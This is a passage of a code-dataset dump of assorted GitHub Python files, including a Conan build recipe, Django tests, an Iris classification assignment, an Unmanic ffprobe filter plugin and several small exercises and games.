squezze]","repo_name":"dewyeon/toy2d","sub_path":"attn_modules/magicAttnBlock.py","file_name":"magicAttnBlock.py","file_ext":"py","file_size_in_byte":3389,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"29"} +{"seq_id":"42458680963","text":"# Напишите программу, которая найдёт произведение пар чисел списка.\n# Парой считаем первый и последний элемент, второй и предпоследний и т.д.\n# Пример:\n# - [2, 3, 4, 5, 6] => [12, 15, 16];\n# - [2, 3, 5, 6] => [12, 15]\n\nfrom random import randint\n\n\nnumber = int(input('Введите количество элементов списка: '))\n\n\ndef create_rand_list(n):\n list_of_elements = []\n for i in range(n):\n list_of_elements.append(randint(0, 10))\n return list_of_elements\n\n\nlist_of_nums = create_rand_list(number)\nprint(list_of_nums)\n\n\ndef prod_of_pairs(list):\n list_of_prods = []\n for i in range((len(list)+1)//2):\n prod = list [i]*list[-1-i]\n list_of_prods.append (prod)\n # print (f'{list [i]}*{list[-1-i]} = {prod}')\n return list_of_prods\n\n\nresult_list = prod_of_pairs(list_of_nums)\nprint(result_list)\n","repo_name":"UlyanaN/Seminar_02.09.2022_Python","sub_path":"Homework_3/Task_02.py","file_name":"Task_02.py","file_ext":"py","file_size_in_byte":976,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"29"} +{"seq_id":"35581066338","text":"from conans import ConanFile, CMake\nfrom conans.tools import download, unzip\nimport os\n\nclass FclConan(ConanFile):\n name = \"fcl\"\n version = \"0.3\"\n settings = \"os\", \"compiler\", \"build_type\", \"arch\"\n options = {\"shared\": [True, False]}\n default_options = \"shared=True\"\n requires = \"libccd/2.0@jslee02/stable\", \"Boost/1.59.0@lasote/stable\"\n exports = \"fcl/*\"\n url=\"https://github.com/jslee02/conan-dart/tree/master/fcl/0.3\"\n\n def source(self):\n zip_name = \"fcl-0.3.2.zip\"\n download(\"https://github.com/flexible-collision-library/fcl/archive/0.3.2.zip\", zip_name)\n unzip(zip_name)\n os.unlink(zip_name)\n\n def build(self):\n cmake = CMake(self.settings)\n shared = \"-DBUILD_SHARED_LIBS=1\" if self.options.shared else \"\"\n self.run(\"cd fcl-0.3.2 && cmake . %s %s\" % (cmake.command_line, shared))\n self.run(\"cd fcl-0.3.2 && cmake --build . %s\" % cmake.build_config)\n\n def package(self):\n # include\n self.copy(\"*.h\", dst=\"include\", src=\"fcl-0.3.2/include\")\n self.copy(\"*.hxx\", dst=\"include\", src=\"fcl-0.3.2/include\")\n \n # lib\n self.copy(\"*.dll\", dst=\"bin\", src=\"fcl-0.3.2/lib\")\n self.copy(\"*.lib\", dst=\"lib\", src=\"fcl-0.3.2/lib\")\n self.copy(\"*.a\", dst=\"lib\", src=\"fcl-0.3.2/lib\")\n self.copy(\"*.so*\", dst=\"lib\", src=\"fcl-0.3.2/lib\")\n self.copy(\"*.dylib*\", dst=\"lib\", src=\"fcl-0.3.2/lib\")\n\n def package_info(self):\n self.cpp_info.libs = [\"fcl\"]\n\n","repo_name":"jslee02/conan-dart","sub_path":"fcl/0.3/conanfile.py","file_name":"conanfile.py","file_ext":"py","file_size_in_byte":1501,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"29"} +{"seq_id":"2139895559","text":"# -*- coding: utf-8 -*-\n\"\"\"Functional tests\"\"\"\n\nfrom django.test import TestCase\nfrom django.test.client import Client\nfrom django.core.urlresolvers import reverse\nfrom django.contrib.auth.models import User\n\nfrom snippify.accounts.models import UserProfile\nfrom django_emailqueue.models import EmailQueue\n\nfrom models import Snippet, SnippetComment\n\nimport json\n\nclass SnippetsTestCase(TestCase):\n def setUp(self):\n \"\"\" Create a user, superuser and few snippets \"\"\"\n self.user = User.objects.create_user('user', 'user@email.com',\n 'password')\n user_profile = UserProfile(user=self.user, restkey='key')\n user_profile.save()\n\n self.superuser = User.objects.create_superuser('superuser',\n 'superuser@email.com',\n 'password')\n\n self.client.login(username='user', password='password')\n\n self.snippet_text = Snippet.objects.create(\n author=self.user,\n title=\"Text file\",\n description=\"Text file for testing\",\n lexer=\"txt\",\n body=\"\"\"This is a text snippet\n this is is the second line\n \"\"\"\n )\n\n self.snippet_python = Snippet.objects.create(\n author=self.user,\n title=\"Python snippet\",\n description=\"Python snippet for testing\",\n lexer=\"python\",\n body=\"\"\"Snippet body\"\"\",\n )\n self.snippet_python.tags.add(\"python\", \"code\")\n\nclass SnippetsViewsTests(SnippetsTestCase):\n \"\"\" Snippets views tests \"\"\"\n\n def test_add_snippet(self):\n \"\"\"Using the snippets_create view add a snippet\"\"\"\n response = self.client.get(reverse('snippets_create'))\n self.assertEqual(response.status_code, 200)\n\n data = {\n 'title': 'Snippet 3',\n 'description': 'Snippet 3 4',\n 'body': \"\"\"#!/usr/bin/python\nx=3\n\"\"\",\n 'tags': 'python test-tag'\n }\n\n #First one is search\n response = self.client.post(reverse('snippets_create'), data)\n\n self.assertEqual(response.status_code, 302)\n snippet = Snippet.objects.get(title=\"Snippet 3\")\n #Pygments guessed the correct lexer\n self.assertEqual('Snippet 3', str(snippet))\n for field, value in data.items():\n if field == 'tags':\n self.assertEqual([t.name for t in snippet.tags.all()],\n data['tags'].split(\" \"))\n else:\n self.assertEqual(getattr(snippet, field), value)\n\n def test_update_snippet(self):\n \"\"\" \"\"\"\n title_text = \"Updated title\"\n response = self.client.post(\n reverse('snippets_update', None, [self.snippet_text.pk]), {\n \"title\": title_text,\n \"description\": self.snippet_text.description,\n \"body\": self.snippet_text.body,\n 'status': 'published',\n 'privacy': 'public',\n })\n self.assertEqual(response.status_code, 302)\n updated_snippet = Snippet.objects.get(pk=self.snippet_text.pk)\n self.assertEqual(updated_snippet.title, title_text)\n\n def test_create_admin(self):\n \"\"\" Add a snippet from administration section \"\"\"\n title = 'a snippet'\n body = 'body'\n self.client.login(username='superuser', password='password')\n self.client.post('/admin/snippets/snippet/add/',\n {'title': title, 'body': body})\n snippet = Snippet.objects.get(title=title)\n self.assertEqual(snippet.body, body)\n\n def test_update_notification(self):\n \"\"\" Create a user and then make him follow another user.\n Update an existing snippet and check if the notification was sent. \"\"\"\n\n def test_preview_snippet(self):\n \"\"\" When the user click the preview button an ajax request will be called\n which returns a html content of the snippet\"\"\"\n\n response = self.client.post(\n reverse('snippets_preview', None, []), {\n \"body\": self.snippet_text.body,\n 'lexer': u'text',\n 'style': u'friendly',\n })\n self.assertEqual(response.status_code, 200)\n self.assertTrue('This is a text snippet' in response.content)\n\n def test_search(self):\n \"\"\" Test the search results \"\"\"\n\n def test_suggest(self):\n \"\"\"Test autosuggest (used in firefox search plugin and google chrome)\"\"\"\n\n def test_download(self):\n \"\"\"Downloading snippet\"\"\"\n\n def test_delete(self):\n \"\"\"Make sure it redirects properly\"\"\"\n\nclass VersioningTestCase(SnippetsTestCase):\n \"\"\" Versioning of snippets support. Check if diff works properly \"\"\"\n\n def test_create(self):\n \"\"\" Update a snippet and check if the version is there\"\"\"\n\n def test_view(self):\n \"\"\" View a specific version \"\"\"\n\n def test_diff(self):\n \"\"\" Update the same snippet the second time and check the diff\n output\"\"\"\n\nclass CommentsTestCase(SnippetsTestCase):\n \"\"\" Testing comments functionality \"\"\"\n\n def test_create(self):\n \"\"\" Comment on a specific snippet \"\"\"\n\n body = u'this is a comment'\n response = self.client.post(reverse('snippets_comment', None, [1]), {\n 'body': body\n })\n self.assertEqual(SnippetComment.objects.get(snippet=1).body, body)\n self.assertTrue(body in json.loads(response.content)['content'])\n\n def test_create_no_body(self):\n \"\"\" \"\"\"\n response = self.client.post(reverse('snippets_comment', None, [1]))\n self.assertEqual(len(SnippetComment.objects.all()), 0)\n self.assertTrue('Body field is required' in response.content)\n\n def test_create_notification(self):\n \"\"\" If an user comments on another user's snippets then an notification\n should be sent.\n\n \"\"\"\n self.client.login(username='superuser', password='password')\n self.test_create()\n self.assertEqual(len(EmailQueue.objects.all()), 1)\n\n def test_create_no_anonymous(self):\n \"\"\" Anonymous users can't post comments \"\"\"\n\n self.client.logout()\n response = self.client.post(reverse('snippets_comment', None, [1],),\n {'body': 'a body'})\n self.assertEqual(len(SnippetComment.objects.all()), 0)\n self.assertEqual(u'You must login to post a comment',\n json.loads(response.content)['error'])\n\n def test_delete(self):\n \"\"\" Administrators should be able to delete comments \"\"\"\n self.test_create()\n self.client.login(username='superuser', password='password')\n response = self.client.get(reverse('snippets_comment',\n args=[1],) + '?delete=1', follow=True)\n self.assertEqual(len(SnippetComment.objects.all()), 0)\n self.assertTrue('Comment deleted succesfully' in response.content)\n\n def test_delete_fail(self):\n \"\"\" Users should NOT be able to delete comments \"\"\"\n self.test_create()\n response = self.client.get(reverse('snippets_comment',\n args=[1],) + '?delete=1', follow=True)\n self.assertEqual(len(SnippetComment.objects.all()), 1)\n self.assertTrue('Permission denied' in response.content)\n\n\nclass TagTests(SnippetsTestCase):\n \"\"\"Test tag views\"\"\"\n\n def test_tags_index(self):\n \"\"\"All the tags\"\"\"\n\n def test_tag(self):\n \"\"\"All the snippets in one tag\"\"\"\n\n def test_tag_user(self):\n \"\"\"All user's snippets tagged with a specific tag\"\"\"\n\nclass ApiTests(SnippetsTestCase):\n\n def test_create(self):\n \"\"\"\" \"\"\"\n","repo_name":"xarg/snippify","sub_path":"snippets/tests.py","file_name":"tests.py","file_ext":"py","file_size_in_byte":7742,"program_lang":"python","lang":"en","doc_type":"code","stars":22,"dataset":"github-code","pt":"29"} +{"seq_id":"28592648165","text":"\n# coding: utf-8\n\n# Machine learning project\n\n# Project Instructions:\n# You can start with the classification project if it helps you. It is the file Classification.ipynb.\n# During the classification lecture we did not talk about certain modeling practices that we used in the two auto case studies and that was intentional so that you can apply them in your IRIS Project. Your assignment is as follow....\n# 1)Scale your independent variables (the x variables) and explain why we typically scale the variables. (20 points)Normalizing the data \n# 2)Produce a cross validation score with K=5 for the decision tree model like we did in the auto case studies and explain why we typically use cross validation in modeling (20 points)\n# 3)Produce a confusion matrix for the decision tree model and explain what you conclude from the confusion matrix (20 points)\n# 4)Produce a confusion matrix for the random forest model and explain what you conclude from the confusion matrix (20 points) \n# 5)This is the hardest part of the project because we did not go over the k selection but there is plenty of literature in the internet. In the classification lecture we used k-neighborhoud and we selected k=5. However, it may not be the optimum k value. Write a program that selects the optimum K for the K Neighbors Classifier model. (20 points)\n# What I am looking for is the python code and the output of the code.\n# A lot of what I am asking we we already cover in the last two lectures feel free to utilize the codes from the case studies. \n# We will go over the solution in the next lecture.\n# IRIS data set is the most commonly used data set in modeling, that is why it comes with sklearn package. I recommend you become familiar with it as a lot of interview questions are based on modeling the IRIS data set.\n# Regards,\n# DP\n\n# # Import libraries and data\n\n# In[1]:\n\n\n#Importing the packages \nimport pandas as pd\nfrom sklearn.datasets import load_iris\nfrom sklearn import datasets\nimport numpy as np\nfrom sklearn.cross_validation import KFold,StratifiedKFold\nfrom sklearn import preprocessing\nfrom sklearn.preprocessing import StandardScaler,OneHotEncoder,LabelEncoder\nfrom sklearn.cross_validation import train_test_split\nfrom sklearn.linear_model import LogisticRegression\n\n\nimport matplotlib.pyplot as plt\nget_ipython().run_line_magic('matplotlib', 'inline')\n\n\n# # 1. Scale Iris Data (using Normalization)\n# - Data can be scaled or preprocessed in 2 ways. Normalization scales the data by putting it in the range between 1 and 0. Standardization creates a distribution out of the data with mean 0 and unit variance. Normalization is good for Iris as it is better when working with k-nearest neighbors and regression coefficients. This is why I have chosen to normalize this data set\n\n# In[2]:\n\n\n#loading and scaling iris data set\niris = datasets.load_iris() \nirisX = iris.data[:,:4] #independant var X\nirisY = iris.target #target var Y\n\n#print(irisX)\n\nirisX = preprocessing.normalize(irisX) # sklearn.preprocessing\n#print(irisX)\ndata = iris['data']\nirisDataFrame = pd.DataFrame(data)\nfeatures = iris['feature_names']\nheader = ['Sepal Length (cm)', 'Sepal width (cm)', 'Petal length (cm)', 'Petal Width(cm)']\nirisDataFrame.columns = header\nirisDataFrame['Target'] = target = irisY\ntargetNames = list(iris.target_names)\nlst = [targetNames[i].title() for i in irisDataFrame['Target'] ]\nirisDataFrame['Target Name'] = lst\n\n\n# # Logistic Regression Model\n\n# In[3]:\n\n\n# C specifies the Inverse of regularization strength. The smaller value the stronger the regularization.\n# Fitting with a Logistic Regression model\niris_logr = LogisticRegression(C=1e4)\niris_logr.fit(irisX, irisY)\nsetosa_coeff, versicolor_coeff, virginica_coeff = iris_logr.coef_\nsetosa_interc, versicolor_interc, virginica_interc = iris_logr.intercept_\n\n# Observe the coefficients of the predictors\nprint(\"Coefficents of setosa, versicolor, virginica: %s\" %str(iris_logr.coef_))\n\n#Observer the intercept\nprint(\"Intercept: %s\" %iris_logr.intercept_)\n\n#Model Score\n## determination\nprint(\"The coefficient of determination for multi-class logistic regression model is: %.4f\" %iris_logr.score(irisX, irisY))\n\n\n# In[4]:\n\n\nfrom sklearn.tree import DecisionTreeClassifier\niris_dtree = DecisionTreeClassifier()\niris_dtree.fit(irisX,irisY)\n#Model Score\n## determination\nprint(\"The coefficient of determination for the Decision Tree model is: %.4f\" %iris_dtree.score(irisX, irisY))\n\n\n# # Random Forest Classifier \n\n# In[5]:\n\n\nfrom sklearn.ensemble import RandomForestClassifier\n\niris_rf = RandomForestClassifier(random_state=1)\niris_rf.fit(irisX,irisY)\n#Model Score\nprint(\"The coefficient of determination for the Random Forest model is: %.4f\" %iris_rf.score(irisX, irisY))\n\n\n# # K- Fold Cross Validation\n\n# In[6]:\n\n\nfrom sklearn.model_selection import KFold\nfrom sklearn.metrics import confusion_matrix\n\nx = irisX\ny = irisY\nkf = KFold(n_splits=5, random_state=None, shuffle=True)\nkf.get_n_splits(x)\nfor train_i, test_i in kf.split(x):\n print(\"TRAIN:\", train_i, \"TEST:\", test_i)\n X_train, X_test = x[train_i], x[test_i]\n y_train, y_test = y[train_i], y[test_i]\n\n\n# # 2. KFold Score\n# We use cross validation so as to better predict the test error and gauge the accuracy of our model by using such a prediction. it is used over a validation set so as to not decrease the size of our training data too much as that raises error.\n\n# In[7]:\n\n\n#K- Fold Score\nfrom sklearn.model_selection import cross_val_score\nfrom sklearn.model_selection import cross_val_predict\nfrom sklearn import metrics\n\niris_dtree.fit(X_train, y_train)\ny_pred = cross_val_predict(iris_dtree,irisX,irisY,cv=5)\naccuracies_cv_new = cross_val_score(iris_dtree, X_train, y_train, cv=5)\nprint('The 5-fold cross validation accuracy of this model is: %s' % '{0:.3%}'.format(accuracies_cv_new.mean()))\nprint('The accuracy of this model is: %s' % '{0:.3%}'.format(metrics.accuracy_score(irisY,y_pred)))\n\n\n# # 3. Confusion Matrix for Decision Tree\n# This is the confusion matrix to guage error rate. (code copied from lectures)\n\n# In[11]:\n\n\n#Confusion Matrix,\nfrom sklearn.metrics import classification_report,confusion_matrix,auc,accuracy_score\nfrom mlxtend.plotting import plot_confusion_matrix \nfrom sklearn.model_selection import cross_val_predict\nfrom sklearn.metrics import confusion_matrix\n\n\ny_pred = cross_val_predict(iris_dtree,irisX,irisY,cv=5)\ncm = confusion_matrix(irisY,y_pred)\nfig = plot_confusion_matrix(conf_mat=cm,figsize=(4,4),cmap=plt.cm.Reds,hide_spines=True)\nplt.title('Confusion Matrix',fontsize=14)\nplt.xlabel('Predicted Values')\nplt.ylabel('Actual Values')\n# Turn the axis grid off\nplt.grid('off')\n\n# Print out metrics\nprint('The 5-fold cross validation accuracy of this model is: %s' % '{0:.3%}'.format(accuracies_cv_new.mean()))\nprint('The accuracy of this model is: %s' % '{0:.3%}'.format(accuracy_score(irisY,y_pred)))\n\n\n# The matrix shows us that the decision tree is a very good predictor for the Iris set. this is apparent from the heavy principal diagonal and 6/150 classification error.\n\n# # 4. Confusion Matrix for Random Forest Tree\n# This is the confusion matrix to guage error rate. (code copied from lectures)\n\n# In[9]:\n\n\n#K- Fold Score Random Forest Model\niris_rf.fit(X_train, y_train)\n\n\ny_pred_rf = cross_val_predict(iris_rf,irisX,irisY,cv=5)\nconf_mat_rf = confusion_matrix(irisY,y_pred_rf)\naccuracies_cv_new = cross_val_score(iris_rf, X_train, y_train, cv=5)\n\n\nfig = plot_confusion_matrix(conf_mat=conf_mat_rf,figsize=(4,4),cmap=plt.cm.Reds,hide_spines=True)\nplt.title('Confusion Matrix',fontsize=14)\nplt.xlabel('Predicted Values')\nplt.ylabel('Actual Values')\n# Turn the axis grid off\nplt.grid('off')\n\n# Print out metrics\nprint('The 5-fold cross validation accuracy of this model is: %s' % '{0:.3%}'.format(accuracies_cv_new.mean()))\nprint('The accuracy of this model is: %s' % '{0:.3%}'.format(accuracy_score(irisY,y_pred)))\n\n\n# The matrix shows us that the decision tree is a very good predictor for the Iris set. this is apparent from the heavy principal diagonal and 4/150 classification error.\n\n# One thing to note is that while are very good models (as shown by their accuracy and confusion scores) the Decision Tree has a slightly lower KFold score and more errors in the confusion matrix. Despite this, decision trees suite the iris data set better.\n\n# # 5. Optimum K for K Neighbors model\n# The best K values were assertained by looking at the highest 10-Fold cross validation accuracy of K-neighbor models with K ranging from 1 to 50.\n\n# In[10]:\n\n\nfrom sklearn.neighbors import KNeighborsClassifier \n\ndef KFoldScore():\n KScore = []\n for i in range(1, 51): \n KNeighbors = KNeighborsClassifier(n_neighbors=i)\n KNeighbors.fit(X_train, y_train)\n #from lecture\n accuracies_cv_new = cross_val_score(KNeighbors, X_train, y_train, cv=10)\n kscore = accuracies_cv_new.mean()\n KScore.append(kscore)\n return (KScore)\n\ndef getMax():\n KScores = KFoldScore()\n maxKScore = max(KScores)\n bestK = []\n for i in range(1, 51):\n if (KScores[i-1] == maxKScore):\n bestK.append(i)\n return (bestK, maxKScore)\n\n#print(KFoldScore())\n#print(getMax())\n\nkresult = getMax()\nprint(\"The best K values < 50 are the following (score =\", kresult[1],\"):\", end=\" \")\nfor i in kresult[0]:\n print(i, end=\",\")\n\n\n","repo_name":"das800/MachineLearningProject","sub_path":"iris.py","file_name":"iris.py","file_ext":"py","file_size_in_byte":9345,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"29"} +{"seq_id":"6934180418","text":"class Solution:\n def permute(self, nums: List[int]) -> List[List[int]]:\n \"\"\"\n :type nums: List[int]\n :rtype: List[List[int]]\n \"\"\"\n global resultList,path\n resultList = []\n path =[]\n def dfsSub(nums):\n global path,resultList\n if len(path) >= len(nums):\n resultList.append(path)\n return\n for i in range(len(nums)):\n if nums[i] not in path:\n path = path + [nums[i]]\n else:\n continue\n dfsSub(nums)\n path = path[:-1]\n return resultList\n dfsSub(nums)\n return resultList","repo_name":"saintifly/leetcode","sub_path":"没有重复元素集合的全排列.py","file_name":"没有重复元素集合的全排列.py","file_ext":"py","file_size_in_byte":708,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"29"} +{"seq_id":"34610003312","text":"import numpy as np \nimport matplotlib.pyplot as plt \n\npeaks = np.abs(np.load('peaks.npy'))\nMasses = np.load('Masses.npy')\ntimes = np.load(\"times.npy\")\nmax = np.argmax(peaks)\nprint(Masses[max])\nprint(max)\nn, bins, patches = plt.hist(times, 10, density=False, facecolor='g', alpha=0.75)\nplt.xlabel('GPS Times')\nplt.ylabel('#')\nplt.title('Histogram of times for SNR peaks')\nplt.show()","repo_name":"francesco-vaselli/itb_problem","sub_path":"checks.py","file_name":"checks.py","file_ext":"py","file_size_in_byte":381,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"29"} +{"seq_id":"29397961625","text":"import drink\n\nclass VendingMachine:\n def __init__(self):\n self.drink_pepsi = [drink.Drink(\"pepsi\", 150) for _ in range(5)]\n self.drink_monster = [drink.Drink(\"monster\", 150) for _ in range(5)]\n self.drink_irohasu = [drink.Drink(\"irohasu\", 150) for _ in range(5)]\n self.drink_all = [self.drink_pepsi, self.drink_monster, self.drink_irohasu]\n self.__sales = 0\n\n @property\n def sales(self):\n return self.__sales\n \n @sales.setter\n def sales(self, value):\n self.__sales = value\n\n def target_drink(self, drink: object):\n for i in self.drink_all:\n if i[0].name == drink.name:\n target_drink = i\n \n return target_drink\n\n def buy(self, drink: object, num, suica: object):\n if len(self.target_drink(drink)) < num:\n raise\n\n for _ in range(num):\n self.target_drink(drink).pop()\n\n self.__sales += int(drink.price) * num\n\n suica.balance -= int(drink.price) * num\n if suica.balance < 0:\n raise\n\n def available_list(self, suica: object):\n available_list = []\n for drink in self.drink_all:\n if (suica.balance >= drink[0].price) \\\n and (len(drink) > 0):\n available_list.append(drink[0].name)\n \n return available_list\n \n def stock(self):\n stock_list = []\n for drink in self.drink_all:\n drink_list = f\"({drink[0].name}:{len(drink)})\"\n stock_list.append(drink_list)\n \n return stock_list\n \n def add_stock(self, drink: object, num):\n for _ in range(num):\n self.target_drink(drink).append(drink)\n","repo_name":"sousou1216/hc_practice","sub_path":"python/vending_machine/vending_machine.py","file_name":"vending_machine.py","file_ext":"py","file_size_in_byte":1713,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"29"} +{"seq_id":"33658445327","text":"import json\nimport logging\nimport jsonata\n\nfrom unmanic.libs.unplugins.settings import PluginSettings\n\nfrom limit_library_search_by_ffprobe_data.lib.ffmpeg import Probe\n\n# Configure plugin logger\nlogger = logging.getLogger(\"Unmanic.Plugin.limit_library_search_by_ffprobe_data\")\n\n\nclass Settings(PluginSettings):\n settings = {\n \"stream_field\": '',\n \"allowed_values\": '',\n \"add_all_matching_values\": False,\n }\n form_settings = {\n \"stream_field\": {\n \"label\": \"The FFprobe field to match against\",\n \"description\": \"A JSONata query to match name of the FFprobe field to match against with the search strings below.\"\n },\n \"allowed_values\": {\n \"label\": \"Search strings\",\n \"description\": \"A comma separated list of strings to match agianst the JSONata query results.\"\n },\n \"add_all_matching_values\": {\n \"label\": \"Add all matching files to pending tasks list\",\n \"description\": \"If this option is enabled and the file matches one of the specified values,\\n\"\n \"this plugin will add the file to Unmanic's pending task list straight away\\n\"\n \"without executing any subsequent file test plugins.\",\n }\n }\n\n def __init__(self, *args, **kwargs):\n super(Settings, self).__init__(*args, **kwargs)\n\n\ndef file_ends_in_allowed_values(probe_info, stream_field, allowed_values):\n \"\"\"\n Check if the file's video codec is in the list of values being searched for\n\n :return:\n \"\"\"\n # If the config is empty (not yet configured) ignore everything\n if not allowed_values:\n logger.debug(\"Plugin has not yet been configured with a list of values to allow. Blocking everything.\")\n return False\n\n # Require a list of probe streams to continue\n file_path = probe_info.get('format', {}).get('filename')\n file_probe_streams = probe_info.get('streams')\n if not file_probe_streams:\n return False\n\n # If the config is empty (not yet configured) ignore everything\n if not allowed_values:\n logger.debug(\"Plugin has not yet been configured with allowed values. Blocking everything.\")\n return False\n\n try:\n context = jsonata.Context()\n discovered_values = context(stream_field, probe_info)\n except ValueError as e:\n logger.debug(\"Failed to match the JSONata query to in the FFprobe data of the file '%s'.\", file_path)\n #logger.debug(\"Exception:\", exc_info=e)\n return False\n\n for allowed_value in allowed_values.split(','):\n # Ignore empty values (if plugin is configured with a trailing ','\n if allowed_value:\n if allowed_value in discovered_values:\n logger.debug(\"File '%s' contains one of the configured values '%s'.\", file_path, allowed_value)\n return True\n\n # File is not in the allowed video values\n logger.debug(\"File '%s' does not contain one of the specified values '%s'.\", file_path, allowed_values)\n return False\n\n\ndef on_library_management_file_test(data):\n \"\"\"\n Runner function - enables additional actions during the library management file tests.\n\n The 'data' object argument includes:\n library_id - The library that the current task is associated with\n path - String containing the full path to the file being tested.\n issues - List of currently found issues for not processing the file.\n add_file_to_pending_tasks - Boolean, is the file currently marked to be added to the queue for processing.\n priority_score - Integer, an additional score that can be added to set the position of the new task in the task queue.\n shared_info - Dictionary, information provided by previous plugin runners. This can be appended to for subsequent runners.\n\n :param data:\n :return:\n\n \"\"\"\n\n # Get settings\n settings = Settings(library_id=data.get('library_id'))\n\n # Get the path to the file\n abspath = data.get('path')\n\n # Get file probe\n probe = Probe.init_probe(data, logger, allowed_mimetypes=['audio', 'video'])\n if not probe:\n # File not able to be probed by ffprobe\n return\n\n # Get the list of configured values to search for\n stream_field = settings.get_setting('stream_field')\n allowed_values = settings.get_setting('allowed_values')\n\n in_allowed_values = file_ends_in_allowed_values(probe.get_probe(), stream_field, allowed_values)\n if not in_allowed_values:\n # Ignore this file\n data['add_file_to_pending_tasks'] = False\n elif in_allowed_values and settings.get_setting('add_all_matching_values'):\n # Force this file to have a pending task created\n data['add_file_to_pending_tasks'] = True\n logger.debug(\n \"File '%s' should be added to task list. \"\n \"File contains specified video codec and plugin is configured to add all matching files.\", abspath)\n","repo_name":"Unmanic/plugin.limit_library_search_by_ffprobe_data","sub_path":"plugin.py","file_name":"plugin.py","file_ext":"py","file_size_in_byte":5139,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"29"} +{"seq_id":"22040929985","text":"# diverse -> if count(s[i]) <= distinct_cnt\n# max distinct chars -> 0, 1, 2, ... , 9 -> 10\n# max length of distinct string -> 10 of each char -> 10^2 = 100\n# for each starting point, check next 100 chars to see if distinct\n# O(n * 10^2)\n\n\nfor _ in range(int(input())):\n n = int(input())\n s = input()\n ans = 0\n\n for i in range(n):\n j = i\n cnts = [0] * 10\n curr_max = 0\n distinct = 0\n\n while j < n and j - i + 1 <= 100:\n curr = int(s[j])\n if cnts[curr] == 0:\n distinct += 1\n cnts[curr] += 1\n curr_max = max(curr_max, cnts[curr])\n if curr_max <= distinct:\n ans += 1\n j += 1\n \n print(ans)","repo_name":"hiroto0222/CodeQuestions","sub_path":"CodeForces/round_833_div_2/B.py","file_name":"B.py","file_ext":"py","file_size_in_byte":733,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"29"} +{"seq_id":"13219529503","text":"#time complexity : O(logn)\n#Space complexity: O(1)\ndef find_element(arr):\n low = 0\n high = len(arr) - 1\n while low + 1 < high:\n mid = low + (high - low) // 2\n \n middiff = arr[mid] - mid\n lowdiff = arr[low] - low\n highdiff = arr[high] - high\n \n if middiff != lowdiff:\n high = mid\n elif middiff != highdiff:\n low = mid\n \n return arr[low] + 1\n \n\narr = [1,3,4,5,7]\nvar = find_element(arr)\nprint(var)","repo_name":"pvk3081/Competitive-Coding-1","sub_path":"Problem2.py","file_name":"Problem2.py","file_ext":"py","file_size_in_byte":499,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"29"} +{"seq_id":"28714007519","text":"p1_score = 0\r\np2_score = 0\r\n\r\n\r\ndef rps_game():\r\n # Prompt users to input r, p, or s\r\n item1 = input(\r\n \"Player 1 - Enter 'r' for Rock, 'p' for Paper, or 's' for Scissors:\\n\").lower()\r\n item2 = input(\r\n \"Player 2 - Enter 'r' for Rock, 'p' for Paper, or 's' for Scissors:\\n\").lower()\r\n\r\n # check to see if valid input for r, p, or s\r\n if item1 == 'r' or item1 == 'p' or item1 == 's':\r\n pass\r\n else:\r\n item1 = input(\r\n \"Player 1 entered invalid input. Please enter 'r', 'p', or 's':\\n\")\r\n if item2 == 'r' or item2 == 'p' or item2 == 's':\r\n pass\r\n else:\r\n item2 = input(\r\n \"Player 2 entered invalid input. Please enter 'r', 'p', or 's':\\n\")\r\n\r\n # determine who wins\r\n # player 1 = r, player 2 = r,p,s\r\n if item1 == 'r':\r\n if item2 == 'r':\r\n print(\"It's a tie!\")\r\n if item2 == 'p':\r\n print(\"Player 2 wins!\")\r\n add_scores(2)\r\n if item2 == 's':\r\n print(\"Player 1 wins!\")\r\n add_scores(1)\r\n # player 1 = s, player 2 = r,p,s\r\n if item1 == 's':\r\n if item2 == 's':\r\n print(\"It's a tie!\")\r\n if item2 == 'p':\r\n print(\"Player 1 wins!\")\r\n add_scores(1)\r\n if item2 == 'r':\r\n print(\"Player 2 wins!\")\r\n add_scores(2)\r\n # player 1 = p, player 2 = r,p,s\r\n if item1 == 'p':\r\n if item2 == 'p':\r\n print(\"It's a tie!\")\r\n if item2 == 's':\r\n print(\"Player 2 wins!\")\r\n add_scores(2)\r\n if item2 == 'r':\r\n print(\"Player 1 wins!\")\r\n add_scores(1)\r\n\r\n\r\ndef add_scores(play):\r\n global p1_score, p2_score\r\n if play == 1:\r\n p1_score += 1\r\n return str(p1_score-1)\r\n if play == 2:\r\n p2_score += 1\r\n return str(p2_score-1)\r\n","repo_name":"anoeller/games_project","sub_path":"rps_game.py","file_name":"rps_game.py","file_ext":"py","file_size_in_byte":1863,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"29"} +{"seq_id":"25173163134","text":"import sounddevice as sd\nimport speech_recognition as sr\nimport wavio\nimport soundfile as sf\nfrom playsound import playsound\nimport os\nfrom time import sleep\n\n#Define function for recording voice\ndef record_voice():\n key = input(\"Press enter to begin recording\")\n if key == '':\n #Record voice into an array\n seconds = 15\n f = 44100\n print(\"Now recording\")\n voice_recording = sd.rec(int(seconds * f), samplerate=f, channels=1)\n sleep(8)\n print(\"Recording will stop in...\")\n sleep(2)\n for i in range(5, 0, -1):\n print(i)\n sleep(1)\n sd.wait()\n print(\"Stopped Recording.\")\n #Save voice recording as .wav file\n wavio.write(\"voicerecording.wav\", voice_recording, f, sampwidth=2)\n #Play voice recording\n print(\"Playing your recording...\")\n playsound(\"voicerecording.wav\")\n else:\n quit()\n\n#Allow user to record themselves and give option to recieve transcript or re-record\nwhile True:\n record_voice()\n key2 = input(\"Press enter to record yourself again, enter t to get a transcript of your recording, enter q to exit: \")\n if key2 == \"t\":\n break\n if key2 == \"q\":\n quit()\n os.remove(\"voicerecording.wav\")\n\n#Retrieve transcript of recording\nprint(\"Retrieving your transcript...\")\n#Listen to the .wav file containg voice recording\nwith sr.AudioFile(\"voicerecording.wav\") as source:\n l_recording = sr.Recognizer().listen(source)\n# Use Google recognizer for speech to text conversion\n 